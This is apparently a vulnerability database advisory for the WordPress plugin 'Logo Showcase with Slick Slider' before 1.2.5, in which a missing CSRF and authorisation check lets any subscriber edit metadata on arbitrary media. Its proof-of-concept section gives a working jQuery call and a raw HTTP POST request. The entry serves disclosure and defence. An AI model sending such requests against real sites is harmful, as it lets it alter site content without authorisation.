WordPress Plugin Vulnerabilities
Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update
Description
The plugin does not have CSRF and authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media.
Proof of Concept
jQuery.post(ajaxurl,{ action: "lswss_save_attachment_data", attachment_id: 564, form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20by%20subscriber&lswss_attachment_alt=Alt%20text&lswss_attachment_link=" }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 213 Connection: close Cookie: [any authenticated user] action=lswss_save_attachment_data&attachment_id=2133&form_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-24 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)